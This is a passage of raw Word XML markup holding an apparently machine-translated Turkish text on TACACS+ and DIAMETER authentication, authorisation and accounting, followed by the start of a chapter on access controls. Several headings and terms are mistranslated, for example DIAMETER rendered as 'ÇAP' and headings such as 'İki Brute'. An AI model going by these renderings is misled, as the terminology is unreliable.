TACACS + orijinal TACACS ile benzerlik göstermiyor ve paket formatları geriye dönük olarak uyumlu değil. Bazı sunucu uygulamaları uyumluluk amacıyla her iki formatı da destekler. Bu bölümün geri kalanı TACACS + 'ya dayanmaktadır, çünkü önerilen IETF standardıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TACACS + sunucuları, sunucu seçeneklerini kontrol etmek, kullanıcıları ve nitelik / değer (AV) çiftlerini tanımlamak ve kimlik doğrulama ve yetkilendirme işlemlerini kontrol etmek için tek bir yapılandırma dosyası kullanır. Seçenekler bölümü, servisin çalışma parametrelerinin, paylaşılan gizli anahtarın ve muhasebe dosyasının adını belirtir. Dosyanın geri kalanı, kimlik doğrulama ve yetkilendirme işlemlerini kontrol etmek için kullanılan bir dizi kullanıcı ve grup tanımlamasıdır. Format, “user = username” veya “group = groupname”, ardından küme parantezleri içindeki bir veya daha fazla AV çiftidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1. </w:t>
      </w:r>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A 1: TACACS Kimlik Doğrulama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">TACACS kimlik doğrulamasının üç paket türü vardır: Başlat, Devam Et ve Yanıtla. İstemci, doğrulamaya, gerçekleştirilecek doğrulama tipini tanımlayan bir Başlangıç paketi ile başlar. PAP gibi basit kimlik doğrulama türleri için, paket aynı zamanda kullanıcı kimliğini ve şifreyi içerebilir. Sunucu bir Yanıtla ile yanıt verir. Gerekirse, ek bilgi istemciye Devam ve sunucu Yanıtla paketleriyle iletilir. İşlemler, oturum açma (ayrıcalık seviyesine göre) ve çeşitli kimlik doğrulama protokollerini (örneğin, CHAP, PAP, PPP, vb.) Kullanarak parola değişikliğini içerir. RADIUS gibi başarılı bir </w:t>
      </w:r>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TACACS kimlik doğrulaması da bağlantı yapılandırması için özellik değeri (AV) çiftleri döndürür. Bunlar yetkilendirme parametrelerini içerebilir veya ayrı olarak alınabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A 2: TACACS Yetkilendirmesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008504A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TACACS'deki yetkilendirme işlevleri, aşağıdakiler için kullanılan İstek ve Yanıt AV çiftlerinden oluşur: • Belirli komutlara, adreslere, hizmetlere veya protokollere izin verme veya reddetme • Kullanıcı ayrıcalık düzeyini ayarlama • Giriş ve çıkış paketini filtrelemeyi • lterler • Erişim kontrol listelerini ayarla ( ACL'ler) • Geri arama eylemlerini çağırma • Belirli bir ağ adresi atama İşlevler, bir kimlik doğrulama işleminin veya yetkilendirme özel isteğinin bir parçası olarak döndürülebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A 3: TACACS Muhasebe </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uhasebe işlevleri, yetkilendirme işlevlerine benzer bir format kullanır. Muhasebe işlevleri Başlat, Durdur, Diğer ve Bekçi köpeğidir. Watchdog işlevi, veriler uzun süre boyunca gönderilmediğinde, TCP oturumlarını doğrulamak için kullanılır. RADIUS tarafından desteklenen standart muhasebe verilerine ek olarak, TACACS, erişim haklarında veya ayrıcalıkta sistem düzeyinde değişiklikleri kaydedebilen bir olay günlüğü özelliğine sahiptir. Olayın nedeni ve bununla ilişkili trafik toplamları da kaydedilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Proksilite, Sorunlar ve Tuzaklar</w:t>
      </w:r>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> TACACS Sınırlamaları TACACS + 'ın prensip sınırlaması kullanım eksikliği olabilir. TACACS + çok yönlü ve sağlam bir protokol olmasına rağmen, daha az sunucu uygulaması ve daha az NAS uygulaması var. Cisco dışında, bu yazar protokolde herhangi bir özel uzantı veya satıcıya özgü AV çiftleri bulamadı. Ek olarak, TACACS’ın ölçeklenebilirliği ve performansı bir sorundur. RADIUS’un tek paket UDP tasarımından farklı olarak, TACACS, bağlantılar kurmak için TCP üzerinden birden çok sorgu kullanır, böylece performansı ciddi şekilde etkileyebilecek ek yükler ortaya çıkar. TACACS + sunucularının proxy istekleri yoktur, bu nedenle birden fazla etki alanında kimlik doğrulamayı desteklemek için bir hiyerarşide yapılandırılamazlar. CiscoSecure ölçeklenebilirliği, birden çok alanda ölçeklendirmek için bölgesel sunuculara ve veritabanı çoğaltmasına dayanır. Uygulanabilir olmakla birlikte, yaklaşım her zaman böyle olmayabilen tek bir yönetim alanı varsaymaktadır. Genel olarak, TACACS +, Cisco’nun NAS tabanlı VPN’lerin uygulanmasına yönelik mevcut desteği olan güvenilir ve oldukça genişletilebilir bir protokoldür. “Outcalls” özelliği, AAA işlevlerini kişiselleştirmek ve üçüncü taraf ürünlere destek eklemek için oldukça basit bir yol sağlar. TACACS +, RADIUS'tan daha fazla kimlik doğrulama parametresini desteklese de, NDS veya bir NT alanı gibi ikincil bir kimlik doğrulama servisiyle ilişkilendirildiğinde en iyi şekilde çalışır. TACACS + 'ın bir IETF standardı olarak benimsenmesi ve kolay genişletilebilirliği, diğer NAS üreticileri tarafından benimsenmesini iyileştirmelidir. O zamana kadar, TACACS + Cisco merkezli ortamlar için sağlam bir AAA çözümü olmaya devam ediyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ÇAP: İki kez RADIUS?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DIAMETER, herhangi bir sayıda kimlik doğrulama, yetkilendirme veya muhasebe planı ve bağlantı türünü destekleyebilen oldukça genişletilebilir bir AAA çerçevesidir. Protokol iki ayrı bölüme ayrılmıştır: Temel Protokol ve Eklentiler. DIAMETER Baz Protokolü, tüm DIAMETER uzantıları tarafından kullanılan mesaj formatını, aktarımı, hata raporlamasını ve güvenlik servislerini tanımlar. DIAMETER Eklentileri, belirli tip kimlik doğrulama, yetkilendirme veya muhasebe işlemlerini (yani NAS, Mobile-IP, ROAMOPS ve EAP) yapmak için tasarlanmış modüllerdir. Mevcut IETF taslağı, NAS talepleri, Mobil IP, güvenli proxy, güçlü güvenlik ve muhasebe için açıklamalar içerir, ancak herhangi bir sayıda başka uzantı mümkündür. DIAMETER, RADIUS protokolü üzerine kuruludur, fakat doğal RADIUS sınırlamalarını aşması için artırıldı. İki protokol ortak bir veri birimini (PDU) paylaşmasa da, RADIUS'tan DIAMETER'e geçişi kolaylaştırmak için uygun benzerlikler vardır. DIAMETER, RADIUS gibi bir UDP aktarımı kullanır, ancak istemci / sunucu yapılandırmasından ziyade eşler arası. Bu, sunucuların istekleri başlatmasına ve iletim hatalarını yerel olarak işlemesine izin verir. DIAMETER, yeniden iletimi azaltmak, başarısız düğüm tespitini iyileştirmek ve düğüm tıkanıklığını azaltmak için güvenilir taşıma uzantıları kullanır. Bu geliştirmeler gecikmeyi azaltır ve yüksek yoğunluklu NAS ve hiyerarşik proxy yapılandırmalarında sunucu performansını önemli ölçüde artırır. Ek iyileştirmeler şunları içerir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">• Dolaşım için tam destek • Alan etki alanı, broker temelli kimlik doğrulama </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Genişletilebilir Kimlik Doğrulama Protokolü (EAP) için tam destek • Satıcı tarafından belirlenen nitelik-değer çiftleri (AVP'ler) ve komutlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> • Tekrarlanan saldırı korumaları ve gizliliği ile geliştirilmiş güvenlik işlevselliği bireysel AVP'ler için</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00707CEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>İki Brute: ÇAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ETİ Yetkilendirme </w:t>
      </w:r>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>işlemleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00707CEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>imlik doğrulama talepleriyle birleştirilebilir veya ayrıca gerçekleştirilebilir. İşlemin özellikleri kullanılan Uzantı tarafından yönetilir ancak aynı modeli izler ve aynı komutları kimlik doğrulama olarak kullanır. Yetkilendirme talepleri mevcut bir oturumda gerçekleştirilmelidir; oturum başlatmak için kullanılamazlar, ancak bir DIAMETER proxy'si kullanılarak iletilebilirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Her Şey için Muhasebe </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DIAMETER, olay izleme, periyodik raporlama, gerçek zamanlı kayıt transferi ve ROAMOPS Muhasebe Veri Değişim Biçimi (ADIF) desteği ekleyerek, RADIUS ve TACACS + 'nın muhasebe yeteneklerini önemli ölçüde geliştirir. ÇAPI muhasebe, yetkilendirme-sunucuya yöneliktir. Müşterinin muhasebe kayıtlarını nasıl üreteceğine ilişkin talimatlar, yetkilendirme sürecinin bir parçası olarak müşteriye iletilir. Ek olarak, DIAMETER muhasebe sunucuları bir müşteriyi mevcut muhasebe verilerini göndermeye zorlayabilir. Bu özellikle bağlantı sorunlarını gidermek veya bir muhasebe sunucusu bir çökme ile karşılaştığında muhasebe verilerini yakalamak için kullanışlıdır. İstemci yazarları ve sunucu anketleri her iki DIAMETER proxy modelinde tam olarak desteklenir. Verimlilik için, kayıtlar normalde parti aktarılır, ancak kredi limiti kontrolleri veya sahtekarlık tespitinin gerekli olduğu </w:t>
      </w:r>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ROAMOPS gibi uygulamalar için, kayıtlar gerçek zamanlı olarak oluşturulabilir. DIAMETER, çivilenmiş devrelerde kullanımın izlenmesi için özellikle yararlı olan periyodik raporlama özelliğine sahip standart bağlantı ve bağlantı kesme hesaplarını geliştirir. DIAMETER ayrıca, başarısız düğümler ve sunucu yeniden başlatmaları gibi servisle ilgili olayları kaydetmek için yararlı olan TACACS + gibi bir olay muhasebesi özelliğine de sahiptir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Güvenlik, Standartlar ve Diğer Öğeler Güçlü Güvenlik Desteği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DIAMETER Baz Protokolünün standart bir parçasıdır. ROAMOPS ve Mobile-IP gibi birçok uygulama, birden çok alanda aktarılması için hassas bağlantı bilgileri gerektirir. Atlamalı atlama güvenliği bu uygulamalar için yetersizdir, çünkü veriler her ara atlamada maruz kalmaya maruz kalmaktadır. DIAMETER’ın Güçlü Proxy Uzantısı, S / MIME nesnelerindeki hassas verileri şifreleyerek ve bunları standart AVP’lerde bulundurarak sorunun üstesinden gelir. Telekomünikasyon, mobil işgücü, VPN, çoklu platform, içeri arama kullanıcı kimlik doğrulama blues'ları var mı? Birinin buna ihtiyacı yok! RADIUS, TACACS ve DIAMETER gibi AAA sunucu çözümleri bu blues'ları kovalayabilir. Biraz dikkatli bir planlama ve birkaç saatlik bir yapılandırma ile, güvenliği artırmak, yönetim zamanını azaltmak ve birinin uzaktan erişim mekanlarını tek, merkezi, esnek ve ölçeklenebilir bir çözümde birleştirmek mümkün olabilir. Bu birinin yüzüne bir gülücük vermeli.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Erişim Kontrollerinin Uygulanması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Stanley Kurzban</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hangi erişim kontrollerinin uygulanacağı kararı organizasyon politikasına ve genel olarak kabul görmüş iki uygulama standardına dayanmaktadır: görevlerin ayrılması ve en az ayrıcalık. Kontrollerin kabul edilmesi ve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu nedenle, etkili bir şekilde kullanıldığında, normal iş akışını daha fazla bozmamalı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gereğinden fazla veya yöneticilere, denetçilere çok fazla yük getirmesi,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>veya yetkili kullanıcılar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Erişim denetimlerinin kuruluşun tüm kaynaklarını yeterli şekilde koruduğundan emin olmak için, önce kaynakları sınıflandırmak gerekebilir. Bu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bölüm bu süreci ve çeşitli erişim kontrol modellerini ele almaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Katılımsız oturumlar üzerinde kontrol sağlama yöntemleri de tartışılmış ve erişim kontrollerinin yönetimi ve uygulanması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>incelemiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>KATEGORİ KAYNAKLARI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Politikalar, veriler ve diğer kaynaklar için hassasiyet seviyeleri (örneğin, çok gizli, gizli, gizli ve sınıflandırılmamış) belirler. Bu seviyeler olmalı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Verilerin işlenmesi için uygun prosedürler konusunda rehberlik etmek için kullanılır - örneğin, kopyalanmaması için talimatlar. Erişim kontrolü kararları </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>için de temel olarak kullanılabilirler. Bu durumda, bireylere yalnızca erişim yetkisi verilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
